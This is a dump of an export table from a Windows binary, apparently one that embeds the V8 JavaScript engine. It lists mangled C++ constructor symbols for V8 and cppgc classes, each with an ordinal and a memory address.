                                                                                                                                                                                                        ??0PersistentRegion@internal@cppgc@@QEAA@XZ8690x14044f4f0
                                                                                                                                                                                                        ??0PersistentRegionLock@internal@cppgc@@QEAA@XZ8700x140457530
                                                                                                                                                                                                        ??0PhiInstruction@compiler@internal@v8@@QEAA@$$QEAV0123@@Z8710x1404ba960
                                                                                                                                                                                                        ??0PhiInstruction@compiler@internal@v8@@QEAA@AEBV0123@@Z8720x1404ba9b0
                                                                                                                                                                                                        ??0PhiInstruction@compiler@internal@v8@@QEAA@PEAVZone@23@H_K@Z8730x140ea41d0
                                                                                                                                                                                                        ??0Platform@cppgc@@QEAA@AEBV01@@Z8740x14044f600
                                                                                                                                                                                                        ??0Platform@cppgc@@QEAA@XZ8750x14044f600
                                                                                                                                                                                                        ??0PlatformAwareObjectStartBitmap@internal@cppgc@@QEAA@PEAE@Z8760x14044f5d0
                                                                                                                                                                                                        ??0PreparseDataBuilder@internal@v8@@QEAA@PEAVZone@12@PEAV012@PEAV?$vector@PEAXV?$allocator@PEAX@std@@@std@@@Z8770x14079fcb0
                                                                                                                                                                                                        ??0ProcessingScope@LocalEmbedderHeapTracer@internal@v8@@QEAA@AEBV0123@@Z8780x1409523a0
                                                                                                                                                                                                        ??0ProcessingScope@LocalEmbedderHeapTracer@internal@v8@@QEAA@PEAV123@@Z8790x1409e5ec0
                                                                                                                                                                                                        ??0ProfileNode@internal@v8@@QEAA@PEAVProfileTree@12@PEAVCodeEntry@12@PEAV012@H@Z8800x140749d90
                                                                                                                                                                                                        ??0ProfileTree@internal@v8@@QEAA@PEAVIsolate@12@PEAVCodeEntryStorage@12@@Z8810x14074cf30
                                                                                                                                                                                                        ??0ProfilerCodeObserver@internal@v8@@QEAA@PEAVIsolate@12@AEAVCodeEntryStorage@12@@Z8820x140760510
                                                                                                                                                                                                        ??0ProfilerEventsProcessor@internal@v8@@IEAA@PEAVIsolate@12@PEAVSymbolizer@12@PEAVProfilerCodeObserver@12@@Z8830x140760570
                                                                                                                                                                                                        ??0ProfilerListener@internal@v8@@QEAA@PEAVIsolate@12@PEAVCodeEventObserver@12@AEAVCodeEntryStorage@12@AEAVWeakCodeRegistry@12@W4CpuProfilingNamingMode@2@@Z8840x140749f60
                                                                                                                                                                                                        ??0PropertyDescriptor@v8@@QEAA@V?$Local@VValue@v8@@@1@0@Z8850x140b06910
                                                                                                                                                                                                        ??0PropertyDescriptor@v8@@QEAA@V?$Local@VValue@v8@@@1@@Z8860x140b06970
                                                                                                                                                                                                        ??0PropertyDescriptor@v8@@QEAA@V?$Local@VValue@v8@@@1@_N@Z8870x140b069c0
                                                                                                                                                                                                        ??0PropertyDescriptor@v8@@QEAA@XZ8880x140b06a30
                                                                                                                                                                                                        ??0PropertyIterator@debug@v8@@QEAA@AEBV012@@Z8890x14047cfd0
                                                                                                                                                                                                        ??0PropertyIterator@debug@v8@@QEAA@XZ8900x14047cfd0
                                                                                                                                                                                                        ??0RandomNumberGenerator@base@v8@@QEAA@XZ8910x140e68d70
                                                                                                                                                                                                        ??0RandomNumberGenerator@base@v8@@QEAA@_J@Z8920x140e5f610
                                                                                                                                                                                                        ??0RawHeap@internal@cppgc@@QEAA@PEAVHeapBase@12@AEBV?$vector@V?$unique_ptr@VCustomSpaceBase@cppgc@@U?$default_delete@VCustomSpaceBase@cppgc@@@std@@@std@@V?$allocator@V?$unique_ptr@VCustomSpaceBase@cppgc@@U?$default_delete@VCustomSpaceBase@cppgc@@@std@@@std@@@2@@std@@@Z8930x1404566c0
                                                                                                                                                                                                        ??0RawMachineAssembler@compiler@internal@v8@@QEAA@PEAVIsolate@23@PEAVGraph@123@PEAVCallDescriptor@123@W4MachineRepresentation@23@V?$Flags@W4Flag@MachineOperatorBuilder@compiler@internal@v8@@I@base@3@VAlignmentRequirements@MachineOperatorBuilder@123@W4PoisoningMitigationLevel@23@@Z8940x14108bcb0
                                                                                                                                                                                                        ??0RawMachineLabel@compiler@internal@v8@@QEAA@W4Type@0123@@Z8950x140f1ce00
                                                                                                                                                                                                        ??0ReadOnlyHeapObjectIterator@internal@v8@@QEAA@PEAVReadOnlyHeap@12@@Z8960x1409636b0
                                                                                                                                                                                                        ??0ReadOnlyHeapObjectIterator@internal@v8@@QEAA@PEAVReadOnlySpace@12@@Z8970x1409636f0
                                                                                                                                                                                                        ??0ReadOnlySerializer@internal@v8@@QEAA@PEAVIsolate@12@V?$Flags@W4SerializerFlag@Snapshot@internal@v8@@H@base@2@@Z8980x1406ccc00
                                                                                                                                                                                                        ??0ReadOnlySpace@internal@v8@@QEAA@PEAVHeap@12@@Z8990x140962b80
                                                                                                                                                                                                        ??0Recorder@metrics@v8@@QEAA@AEBV012@@Z9000x14047cfe0
                                                                                                                                                                                                        ??0Recorder@metrics@v8@@QEAA@XZ9010x14047cfe0
                                                                                                                                                                                                        ??0RecursiveMutex@base@v8@@QEAA@XZ9020x140e5f160
                                                                                                                                                                                                        ??0Reducer@compiler@internal@v8@@QEAA@AEBV0123@@Z9030x140e816b0
                                                                                                                                                                                                        ??0Reducer@compiler@internal@v8@@QEAA@XZ9040x140e816b0
                                                                                                                                                                                                        ??0RedundancyElimination@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@PEAVZone@23@@Z9050x14104d570
                                                                                                                                                                                                        ??0RegExpBytecodeGenerator@internal@v8@@QEAA@PEAVIsolate@12@PEAVZone@12@@Z9060x14073c4b0
                                                                                                                                                                                                        ??0RegExpMacroAssemblerX64@internal@v8@@QEAA@PEAVIsolate@12@PEAVZone@12@W4Mode@NativeRegExpMacroAssembler@12@H@Z9070x1404aa280
                                                                                                                                                                                                        ??0RegExpParser@internal@v8@@QEAA@PEAVFlatStringReader@12@V?$Flags@W4Flag@JSRegExp@internal@v8@@H@base@2@PEAVIsolate@12@PEAVZone@12@@Z9080x14071b860
                                                                                                                                                                                                        ??0RegionAllocator@base@v8@@QEAA@_K00@Z9090x140e6c5c0
                                                                                                                                                                                                        ??0Register@interpreter@internal@v8@@QEAA@H@Z9100x14047cff0
                                                                                                                                                                                                        ??0RegisterConfiguration@internal@v8@@QEAA@AEBV012@@Z9110x140500910
                                                                                                                                                                                                        ??0RegisterConfiguration@internal@v8@@QEAA@HHHHPEBH0W4AliasingKind@012@@Z9120x140a81230
                                                                                                                                                                                                        ??0RegisterState@v8@@QEAA@AEBU01@@Z9130x140b06a80
                                                                                                                                                                                                        ??0RegisterState@v8@@QEAA@XZ9140x14044f4f0
                                                                                                                                                                                                        ??0RelocIterator@internal@v8@@AEAA@VCode@12@_K1PEBE2H@Z9150x140a80110
                                                                                                                                                                                                        ??0RelocIterator@internal@v8@@QEAA@AEBVCodeDesc@12@H@Z9160x140a80160
                                                                                                                                                                                                        ??0RelocIterator@internal@v8@@QEAA@PEAVEmbeddedData@12@VCode@12@H@Z9170x140a801c0
                                                                                                                                                                                                        ??0RelocIterator@internal@v8@@QEAA@V?$Vector@E@base@2@V?$Vector@$$CBE@42@_KH@Z9180x140a80430
                                                                                                                                                                                                        ??0RelocIterator@internal@v8@@QEAA@VCode@12@H@Z9190x140a80490
                                                                                                                                                                                                        ??0RelocIterator@internal@v8@@QEAA@VCode@12@VByteArray@12@H@Z9200x140a804b0
                                                                                                                                                                                                        ??0RelocIterator@internal@v8@@QEAA@VCodeReference@12@H@Z9210x140a80580
                                                                                                                                                                                                        ??0RemoteObject@API@Runtime@protocol@v8_inspector@@QEAA@$$QEAV01234@@Z9220x14042dea0
                                                                                                                                                                                                        ??0RemoteObject@API@Runtime@protocol@v8_inspector@@QEAA@AEBV01234@@Z9230x14042dea0
                                                                                                                                                                                                        ??0RemoteObject@API@Runtime@protocol@v8_inspector@@QEAA@XZ9240x14042dea0
                                                                                                                                                                                                        ??0RepresentationChanger@compiler@internal@v8@@QEAA@PEAVJSGraph@123@PEAVJSHeapBroker@123@@Z9250x1410a4de0
                                                                                                                                                                                                        ??0ResourceConstraints@v8@@QEAA@XZ9260x140079870
                                                                                                                                                                                                        ??0ResumeJumpTarget@compiler@internal@v8@@AEAA@HHH@Z9270x140b06610
                                                                                                                                                                                                        ??0RuntimeCallStats@internal@v8@@QEAA@W4ThreadType@012@@Z9280x140078ac0
                                                                                                                                                                                                        ??0SafeForTerminationScope@Isolate@v8@@QEAA@PEAV12@@Z9290x140b06b10
                                                                                                                                                                                                        ??0SafepointScope@internal@v8@@QEAA@PEAVHeap@12@@Z9300x1409624f0
                                                                                                                                                                                                        ??0Sampler@sampler@v8@@QEAA@PEAVIsolate@2@@Z9310x1408dfd50
                                                                                                                                                                                                        ??0SamplingEventsProcessor@internal@v8@@QEAA@PEAVIsolate@12@PEAVSymbolizer@12@PEAVProfilerCodeObserver@12@PEAVCpuProfilesCollection@12@VTimeDelta@base@2@_N@Z9320x1407606e0
                                                                                                                                                                                                        ??0SaveAndSwitchContext@internal@v8@@QEAA@PEAVIsolate@12@VContext@12@@Z9330x140a0a430
                                                                                                                                                                                                        ??0SaveContext@internal@v8@@QEAA@PEAVIsolate@12@@Z9340x140a0a470
                                                                                                                                                                                                        ??0Scanner@internal@v8@@QEAA@PEAVUtf16CharacterStream@12@VUnoptimizedCompileFlags@12@@Z9350x140764b10
                                                                                                                                                                                                        ??0Schedule@compiler@internal@v8@@QEAA@PEAVZone@23@_K@Z9360x140ee1220
                                                                                                                                                                                                        ??0ScheduledErrorThrower@wasm@internal@v8@@QEAA@PEAVIsolate@23@PEBD@Z9370x140523620
                                                                                                                                                                                                        ??0Scheduler@compiler@internal@v8@@AEAA@PEAVZone@23@PEAVGraph@123@PEAVSchedule@123@V?$Flags@W4Flag@Scheduler@compiler@internal@v8@@H@base@3@_KPEAVTickCounter@23@PEBVProfileDataFromFile@23@@Z9380x14104ef30
                                                                                                                                                                                                        ??0Scheduler@compiler@internal@v8@@QEAA@$$QEAV0123@@Z9390x140f0b600
                                                                                                                                                                                                        ??0Scheduler@compiler@internal@v8@@QEAA@AEBV0123@@Z9400x140f0b740
                                                                                                                                                                                                        ??0Scope@GCTracer@internal@v8@@QEAA@PEAV123@W4ScopeId@0123@W4ThreadKind@23@@Z9410x1409c8020
                                                                                                                                                                                                        ??0Scope@Isolate@v8@@QEAA@PEAV12@@Z9420x140078f10
                                                                                                                                                                                                        ??0Scope@internal@v8@@AEAA@PEAVZone@12@PEBVAstRawString@12@W4MaybeAssignedFlag@12@V?$Handle@VScopeInfo@internal@v8@@@12@@Z9430x140af1d20
                                                                                                                                                                                                        ??0Scope@internal@v8@@AEAA@PEAVZone@12@W4ScopeType@12@PEAVAstValueFactory@12@V?$Handle@VScopeInfo@internal@v8@@@12@@Z9440x140af1e50
                                                                                                                                                                                                        ??0Scope@internal@v8@@IEAA@PEAVZone@12@@Z9450x140af1f90
                                                                                                                                                                                                        ??0Scope@internal@v8@@QEAA@$$QEAV012@@Z9460x1406ea7b0
                                                                                                                                                                                                        ??0Scope@internal@v8@@QEAA@PEAVZone@12@PEAV012@W4ScopeType@12@@Z9470x140af2010
                                                                                                                                                                                                        ??0ScopeIterator@debug@v8@@QEAA@XZ9480x14047cfd0
                                                                                                                                                                                                        ??0ScopedExceptionHandler@compiler@internal@v8@@QEAA@PEAVCodeAssembler@123@PEAV?$CodeAssemblerParameterizedLabel@VObject@internal@v8@@@123@@Z9490x140f1ce20
                                                                                                                                                                                                        ??0ScopedExceptionHandler@compiler@internal@v8@@QEAA@PEAVCodeAssembler@123@PEAVCodeAssemblerLabel@123@PEAV?$TypedCodeAssemblerVariable@VObject@internal@v8@@@123@@Z9500x140f1ce90
                                                                                                                                                                                                        ??0ScriptData@Coverage@debug@v8@@AEAA@_KV?$shared_ptr@VCoverage@internal@v8@@@std@@@Z9510x140a6d8c0
                                                                                                                                                                                                        ??0ScriptData@Coverage@debug@v8@@QEAA@$$QEAV0123@@Z9520x14047bda0
                                                                                                                                                                                                        ??0ScriptData@TypeProfile@debug@v8@@AEAA@_KV?$shared_ptr@VTypeProfile@internal@v8@@@std@@@Z9530x140a6d8c0
                                                                                                                                                                                                        ??0ScriptData@TypeProfile@debug@v8@@QEAA@$$QEAV0123@@Z9540x14047bda0
                                                                                                                                                                                                        ??0ScriptData@internal@v8@@QEAA@PEBEH@Z9550x1406dad80
                                                                                                                                                                                                        ??0ScriptIterator@SharedFunctionInfo@internal@v8@@QEAA@PEAVIsolate@23@VScript@23@@Z9560x1407d68f0
                                                                                                                                                                                                        ??0ScriptStreamingTask@ScriptCompiler@v8@@AEAA@PEAUScriptStreamingData@internal@2@@Z9570x140078b40
                                                                                                                                                                                                        ??0SealHandleScope@v8@@QEAA@PEAVIsolate@1@@Z9580x140b06b30
                                                                                                                                                                                                        ??0SearchMatch@API@Debugger@protocol@v8_inspector@@QEAA@$$QEAV01234@@Z9590x14042dea0
                                                                                                                                                                                                        ??0SearchMatch@API@Debugger@protocol@v8_inspector@@QEAA@AEBV01234@@Z9600x14042dea0
                                                                                                                                                                                                        ??0SearchMatch@API@Debugger@protocol@v8_inspector@@QEAA@XZ9610x14042dea0
                                                                                                                                                                                                        ??0SegmentBase@internal@base@heap@@QEAA@G@Z9620x14044f610
                                                                                                                                                                                                        ??0Semaphore@base@v8@@QEAA@H@Z9630x140e68720
                                                                                                                                                                                                        ??0SetupIsolateDelegate@internal@v8@@QEAA@AEBV012@@Z9640x1408f0900
                                                                                                                                                                                                        ??0SetupIsolateDelegate@internal@v8@@QEAA@_N@Z9650x1408f0920
                                                                                                                                                                                                        ??0SharedFunctionInfoRef@compiler@internal@v8@@QEAA@PEAVJSHeapBroker@123@PEAVObjectData@123@_N@Z9660x1404baa80
                                                                                                                                                                                                        ??0SharedMemoryStatistics@v8@@QEAA@XZ9670x14007b730
                                                                                                                                                                                                        ??0SharedMutex@base@v8@@QEAA@XZ9680x1400fba60
                                                                                                                                                                                                        ??0SharedTurboAssembler@internal@v8@@QEAA@PEAVIsolate@12@AEBUAssemblerOptions@12@W4CodeObjectRequired@12@@Z9690x14049b380
                                                                                                                                                                                                        ??0SharedTurboAssembler@internal@v8@@QEAA@PEAVIsolate@12@AEBUAssemblerOptions@12@W4CodeObjectRequired@12@V?$unique_ptr@VAssemblerBuffer@internal@v8@@U?$default_delete@VAssemblerBuffer@internal@v8@@@std@@@std@@@Z9700x14049b3c0
                                                                                                                                                                                                        ??0SharedTurboAssembler@internal@v8@@QEAA@PEAVIsolate@12@W4CodeObjectRequired@12@@Z9710x14049b420
                                                                                                                                                                                                        ??0SharedTurboAssembler@internal@v8@@QEAA@PEAVIsolate@12@W4CodeObjectRequired@12@V?$unique_ptr@VAssemblerBuffer@internal@v8@@U?$default_delete@VAssemblerBuffer@internal@v8@@@std@@@std@@@Z9720x14049b4a0
                                                                                                                                                                                                        ??0SignatureMap@wasm@internal@v8@@QEAA@$$QEAV0123@@Z9730x14047d000
                                                                                                                                                                                                        ??0SignatureMap@wasm@internal@v8@@QEAA@XZ9740x14047d0f0
                                                                                                                                                                                                        ??0SimplifiedLowering@compiler@internal@v8@@QEAA@PEAVJSGraph@123@PEAVJSHeapBroker@123@PEAVZone@23@PEAVSourcePositionTable@123@PEAVNodeOriginTable@123@W4PoisoningMitigationLevel@23@PEAVTickCounter@23@PEAVLinkage@123@PEAVObserveNodeManager@123@@Z9750x14106c710
                                                                                                                                                                                                        ??0SimplifiedOperatorBuilder@compiler@internal@v8@@QEAA@PEAVZone@23@@Z9760x140f44380
                                                                                                                                                                                                        ??0SimplifiedOperatorReducer@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@PEAVJSGraph@123@PEAVJSHeapBroker@123@@Z9770x141074160
                                                                                                                                                                                                        ??0SnapshotCreator@v8@@QEAA@PEAVIsolate@1@PEB_JPEAVStartupData@1@@Z9780x140b06b70
                                                                                                                                                                                                        ??0SnapshotCreator@v8@@QEAA@PEB_JPEAVStartupData@1@@Z9790x140b06c70
                                                                                                                                                                                                        ??0SnapshotData@internal@v8@@IEAA@XZ9800x140527bb0
                                                                                                                                                                                                        ??0SnapshotData@internal@v8@@QEAA@$$QEAV012@@Z9810x140527bd0
                                                                                                                                                                                                        ??0SnapshotData@internal@v8@@QEAA@PEBVSerializer@12@@Z9820x1406c46a0
                                                                                                                                                                                                        ??0SnapshotData@internal@v8@@QEAA@V?$Vector@$$CBE@base@2@@Z9830x140527c10
                                                                                                                                                                                                        ??0SourceIdAssigner@compiler@internal@v8@@QEAA@$$QEAV0123@@Z9840x140eeb000
                                                                                                                                                                                                        ??0SourceIdAssigner@compiler@internal@v8@@QEAA@AEBV0123@@Z9850x140eeb060
                                                                                                                                                                                                        ??0SourceIdAssigner@compiler@internal@v8@@QEAA@_K@Z9860x140eeb160
                                                                                                                                                                                                        ??0SourceLocation@cppgc@@AEAA@PEBD0_K@Z9870x14044f620
                                                                                                                                                                                                        ??0SourceLocation@cppgc@@QEAA@XZ9880x14007b730
                                                                                                                                                                                                        ??0SourcePositionTable@compiler@internal@v8@@QEAA@PEAVGraph@123@@Z9890x140f53de0
                                                                                                                                                                                                        ??0SourcePositionTable@internal@v8@@QEAA@XZ9900x14007b730
                                                                                                                                                                                                        ??0SourcePositionTableBuilder@internal@v8@@QEAA@$$QEAV012@@Z9910x14047d160
                                                                                                                                                                                                        ??0SourcePositionTableBuilder@internal@v8@@QEAA@AEBV012@@Z9920x14047d1b0
                                                                                                                                                                                                        ??0SourcePositionTableBuilder@internal@v8@@QEAA@PEAVZone@12@W4RecordingMode@012@@Z9930x140a7ef20
                                                                                                                                                                                                        ??0SourcePositionTableIterator@internal@v8@@QEAA@V?$Handle@VByteArray@internal@v8@@@12@W4IterationFilter@012@W4FunctionEntryFilter@012@@Z9940x140a7ef50
                                                                                                                                                                                                        ??0SourcePositionTableIterator@internal@v8@@QEAA@V?$Vector@$$CBE@base@2@W4IterationFilter@012@W4FunctionEntryFilter@012@@Z9950x140a7efb0
                                                                                                                                                                                                        ??0SourcePositionTableIterator@internal@v8@@QEAA@VByteArray@12@W4IterationFilter@012@W4FunctionEntryFilter@012@@Z9960x140a7f010
                                                                                                                                                                                                        ??0Space@internal@v8@@QEAA@PEAVHeap@12@W4AllocationSpace@12@PEAVFreeList@12@@Z9970x14047d2a0
                                                                                                                                                                                                        ??0SpaceIterator@internal@v8@@QEAA@AEBV012@@Z9980x14047d400
                                                                                                                                                                                                        ??0SpaceIterator@internal@v8@@QEAA@PEAVHeap@12@@Z9990x1409add90
                                                                                                                                                                                                        ??0Stack@base@heap@@QEAA@PEBX@Z10000x140078b40
                                                                                                                                                                                                        ??0StackFrameIterator@internal@v8@@QEAA@PEAVIsolate@12@@Z10010x140a1f9f0
                                                                                                                                                                                                        ??0StackFrameIterator@internal@v8@@QEAA@PEAVIsolate@12@PEAVThreadLocalTop@12@@Z10020x140a1fa10
                                                                                                                                                                                                        ??0StackGuard@internal@v8@@QEAA@PEAVIsolate@12@@Z10030x14047d420
                                                                                                                                                                                                        ??0StackTrace@API@Runtime@protocol@v8_inspector@@QEAA@$$QEAV01234@@Z10040x14042dea0
                                                                                                                                                                                                        ??0StackTrace@API@Runtime@protocol@v8_inspector@@QEAA@AEBV01234@@Z10050x14042dea0
                                                                                                                                                                                                        ??0StackTrace@API@Runtime@protocol@v8_inspector@@QEAA@XZ10060x14042dea0
                                                                                                                                                                                                        ??0StackTrace@debug@base@v8@@QEAA@PEAU_EXCEPTION_POINTERS@@@Z10070x140e6ae80
                                                                                                                                                                                                        ??0StackTrace@debug@base@v8@@QEAA@PEBQEBX_K@Z10080x140e6c070
                                                                                                                                                                                                        ??0StackTrace@debug@base@v8@@QEAA@PEBU_CONTEXT@@@Z10090x140e6aea0
                                                                                                                                                                                                        ??0StackTrace@debug@base@v8@@QEAA@XZ10100x140e6aec0
                                                                                                                                                                                                        ??0StackTraceFrameIterator@internal@v8@@QEAA@PEAVIsolate@12@@Z10110x140a20110
                                                                                                                                                                                                        ??0StackTraceFrameIterator@internal@v8@@QEAA@PEAVIsolate@12@W4StackFrameId@12@@Z10120x140a20170
                                                                                                                                                                                                        ??0StackTraceId@API@Runtime@protocol@v8_inspector@@QEAA@$$QEAV01234@@Z10130x14042dea0
                                                                                                                                                                                                        ??0StackTraceId@API@Runtime@protocol@v8_inspector@@QEAA@AEBV01234@@Z10140x14042dea0
                                                                                                                                                                                                        ??0StackTraceId@API@Runtime@protocol@v8_inspector@@QEAA@XZ10150x14042dea0
                                                                                                                                                                                                        ??0StackTraceIterator@debug@v8@@QEAA@XZ10160x14047d460
                                                                                                                                                                                                        ??0StandaloneTestingHeap@testing@cppgc@@QEAA@AEAVHeapHandle@2@@Z10170x140078b40
                                                                                                                                                                                                        ??0StartupSerializer@internal@v8@@QEAA@PEAVIsolate@12@V?$Flags@W4SerializerFlag@Snapshot@internal@v8@@H@base@2@PEAVReadOnlySerializer@12@@Z10180x1406c0670
                                                                                                                                                                                                        ??0StateValuesAccess@compiler@internal@v8@@QEAA@PEAVNode@123@@Z10190x140078b40
                                                                                                                                                                                                        ??0StateValuesCache@compiler@internal@v8@@QEAA@PEAVJSGraph@123@@Z10200x140f56be0
                                                                                                                                                                                                        ??0StatsCollector@internal@cppgc@@QEAA@PEAVPlatform@2@@Z10210x140455750
                                                                                                                                                                                                        ??0StatsCounterThreadSafe@internal@v8@@AEAA@PEAVCounters@12@PEBD@Z10220x1408dca20
                                                                                                                                                                                                        ??0StatsScope@ZoneStats@compiler@internal@v8@@QEAA@PEAV1234@@Z10230x14104c3f0
                                                                                                                                                                                                        ??0StreamedSource@ScriptCompiler@v8@@QEAA@PEAVExternalSourceStream@12@W4Encoding@012@@Z10240x140b06cc0
                                                                                                                                                                                                        ??0StreamedSource@ScriptCompiler@v8@@QEAA@V?$unique_ptr@VExternalSourceStream@ScriptCompiler@v8@@U?$default_delete@VExternalSourceStream@ScriptCompiler@v8@@@std@@@std@@W4Encoding@012@@Z10250x140b06cf0
                                                                                                                                                                                                        ??0StreamingDecoder@wasm@internal@v8@@QEAA@AEBV0123@@Z10260x140543c10
                                                                                                                                                                                                        ??0StreamingDecoder@wasm@internal@v8@@QEAA@XZ10270x140543c80
                                                                                                                                                                                                        ??0StreamingProcessor@wasm@internal@v8@@QEAA@AEBV0123@@Z10280x140543cb0
                                                                                                                                                                                                        ??0StreamingProcessor@wasm@internal@v8@@QEAA@XZ10290x140543cb0
                                                                                                                                                                                                        ??0String16@v8_inspector@@QEAA@PEBD@Z10300x14069d4d0
                                                                                                                                                                                                        ??0String16@v8_inspector@@QEAA@PEBG@Z10310x14069d600
                                                                                                                                                                                                        ??0StringBuffer@v8_inspector@@QEAA@AEBV01@@Z10320x140079fd0
                                                                                                                                                                                                        ??0StringBuffer@v8_inspector@@QEAA@XZ10330x140079fd0
                                                                                                                                                                                                        ??0StringTable@internal@v8@@QEAA@PEAVIsolate@12@@Z10340x1407ca570
                                                                                                                                                                                                        ??0StringView@v8_inspector@@QEAA@PEBE_K@Z10350x14042dec0
                                                                                                                                                                                                        ??0StringView@v8_inspector@@QEAA@PEBG_K@Z10360x14042ded0
                                                                                                                                                                                                        ??0StringView@v8_inspector@@QEAA@XZ10370x14042dee0
                                                                                                                                                                                                        ??0StringsStorage@internal@v8@@QEAA@XZ10380x1407462c0
                                                                                                                                                                                                        ??0StubCache@internal@v8@@QEAA@PEAVIsolate@12@@Z10390x14093fae0
                                                                                                                                                                                                        ??0SuppressMicrotaskExecutionScope@Isolate@v8@@QEAA@PEAV12@PEAVMicrotaskQueue@2@@Z10400x140b06d60
                                                                                                                                                                                                        ??0Sweeper@internal@cppgc@@QEAA@AEAVHeapBase@12@@Z10410x140452d00
                                                                                                                                                                                                        ??0SwissNameDictionary@internal@v8@@IEAA@_K@Z10420x140078b40
                                                                                                                                                                                                        ??0SwissNameDictionary@internal@v8@@QEAA@XZ10430x1400fba60
                                                                                                                                                                                                        ??0SwitchBuilder@interpreter@internal@v8@@QEAA@PEAVBytecodeArrayBuilder@123@PEAVBlockCoverageBuilder@123@PEAVSwitchStatement@23@HPEAVBytecodeJumpTable@123@@Z10440x1408f2af0
                                                                                                                                                                                                        ??0Symbolizer@internal@v8@@QEAA@PEAVCodeMap@12@@Z10450x140078b40
                                                                                                                                                                                                        ??0SyncStreamingDecoder@wasm@internal@v8@@QEAA@$$QEAV0123@@Z10460x140570530
                                                                                                                                                                                                        ??0SyncStreamingDecoder@wasm@internal@v8@@QEAA@AEBV0123@@Z10470x140570660
                                                                                                                                                                                                        ??0SyncStreamingDecoder@wasm@internal@v8@@QEAA@PEAVIsolate@23@AEBVWasmFeatures@123@V?$Handle@VContext@internal@v8@@@23@PEBDV?$shared_ptr@VCompilationResultResolver@wasm@internal@v8@@@std@@@Z10480x140570840
                                                                                                                                                                                                        ??0Thread@base@v8@@QEAA@AEBVOptions@012@@Z10490x140e5f630
                                                                                                                                                                                                        ??0ThreadTicks@base@v8@@AEAA@_J@Z10500x140078b40
                                                                                                                                                                                                        ??0ThreadTicks@base@v8@@QEAA@XZ10510x1400fba60
                                                                                                                                                                                                        ??0ThrowOnJavascriptExecution@internal@v8@@QEAA@PEAVIsolate@12@@Z10520x140a7d8c0
                                                                                                                                                                                                        ??0TickSample@internal@v8@@QEAA@XZ10530x140745020
                                                                                                                                                                                                        ??0Time@base@v8@@AEAA@_J@Z10540x140078b40
                                                                                                                                                                                                        ??0Time@base@v8@@QEAA@XZ10550x1400fba60
                                                                                                                                                                                                        ??0TimeDelta@base@v8@@AEAA@_J@Z10560x140078b40
                                                                                                                                                                                                        ??0TimeDelta@base@v8@@QEAA@XZ10570x1400fba60
                                                                                                                                                                                                        ??0TimeTicks@base@v8@@AEAA@_J@Z10580x140078b40
                                                                                                                                                                                                        ??0TimeTicks@base@v8@@QEAA@XZ10590x1400fba60
                                                                                                                                                                                                        ??0TopLevelLiveRange@compiler@internal@v8@@QEAA@HW4MachineRepresentation@23@@Z10600x140f7e4d0
                                                                                                                                                                                                        ??0TracedGlobalHandleVisitor@EmbedderHeapTracer@v8@@QEAA@AEBV012@@Z10610x140079ac0
                                                                                                                                                                                                        ??0TracedGlobalHandleVisitor@EmbedderHeapTracer@v8@@QEAA@XZ10620x140079ac0
                                                                                                                                                                                                        ??0TracedValue@tracing@v8@@AEAA@XZ10630x1406b6840
                                                                                                                                                                                                        ??0TransitionsAccessor@internal@v8@@QEAA@PEAVIsolate@12@V?$Handle@VMap@internal@v8@@@12@_N@Z10640x14047d470
                                                                                                                                                                                                        ??0TransitionsAccessor@internal@v8@@QEAA@PEAVIsolate@12@VMap@12@PEAV?$CombinationAssertScope@V?$PerThreadAssertScopeDebugOnly@$0A@$0A@@internal@v8@@V?$PerThreadAssertScopeDebugOnly@$00$0A@@23@@12@_N@Z10650x14047d530
                                                                                                                                                                                                        ??0TryCatch@v8@@QEAA@PEAVIsolate@1@@Z10660x140b06d90
                                                                                                                                                                                                        ??0TryCatchBuilder@interpreter@internal@v8@@QEAA@PEAVBytecodeArrayBuilder@123@PEAVBlockCoverageBuilder@123@PEAVTryCatchStatement@23@W4CatchPrediction@HandlerTable@23@@Z10670x1408f2c00
                                                                                                                                                                                                        ??0TryFinallyBuilder@interpreter@internal@v8@@QEAA@PEAVBytecodeArrayBuilder@123@PEAVBlockCoverageBuilder@123@PEAVTryFinallyStatement@23@W4CatchPrediction@HandlerTable@23@@Z10680x1408f2c70
                                                                                                                                                                                                        ??0TurboAssembler@internal@v8@@QEAA@PEAVIsolate@12@AEBUAssemblerOptions@12@W4CodeObjectRequired@12@@Z10690x14049b090
                                                                                                                                                                                                        ??0TurboAssembler@internal@v8@@QEAA@PEAVIsolate@12@AEBUAssemblerOptions@12@W4CodeObjectRequired@12@V?$unique_ptr@VAssemblerBuffer@internal@v8@@U?$default_delete@VAssemblerBuffer@internal@v8@@@std@@@std@@@Z10700x14049b0d0
                                                                                                                                                                                                        ??0TurboAssembler@internal@v8@@QEAA@PEAVIsolate@12@W4CodeObjectRequired@12@@Z10710x14049b130
                                                                                                                                                                                                        ??0TurboAssembler@internal@v8@@QEAA@PEAVIsolate@12@W4CodeObjectRequired@12@V?$unique_ptr@VAssemblerBuffer@internal@v8@@U?$default_delete@VAssemblerBuffer@internal@v8@@@std@@@std@@@Z10720x14049b160
                                                                                                                                                                                                        ??0TurboAssemblerBase@internal@v8@@QEAA@PEAVIsolate@12@AEBUAssemblerOptions@12@W4CodeObjectRequired@12@V?$unique_ptr@VAssemblerBuffer@internal@v8@@U?$default_delete@VAssemblerBuffer@internal@v8@@@std@@@std@@@Z10730x140a7dcf0
                                                                                                                                                                                                        ??0TurboAssemblerBase@internal@v8@@QEAA@PEAVIsolate@12@W4CodeObjectRequired@12@V?$unique_ptr@VAssemblerBuffer@internal@v8@@U?$default_delete@VAssemblerBuffer@internal@v8@@@std@@@std@@@Z10740x14049b500
                                                                                                                                                                                                        ??0Type@compiler@internal@v8@@AEAA@I@Z10750x1404baae0
                                                                                                                                                                                                        ??0Type@compiler@internal@v8@@AEAA@PEAVTypeBase@123@@Z10760x140078b40
                                                                                                                                                                                                        ??0Type@compiler@internal@v8@@QEAA@XZ10770x1400fba60
                                                                                                                                                                                                        ??0TypeCache@compiler@internal@v8@@QEAA@XZ10780x140fd38b0
                                                                                                                                                                                                        ??0TypeNarrowingReducer@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@PEAVJSGraph@123@PEAVJSHeapBroker@123@@Z10790x1410782e0
                                                                                                                                                                                                        ??0TypeProfile@debug@v8@@AEAA@V?$shared_ptr@VTypeProfile@internal@v8@@@std@@@Z10800x14042dd80
                                                                                                                                                                                                        ??0TypeProfile@debug@v8@@QEAA@$$QEAV012@@Z10810x14042dd80
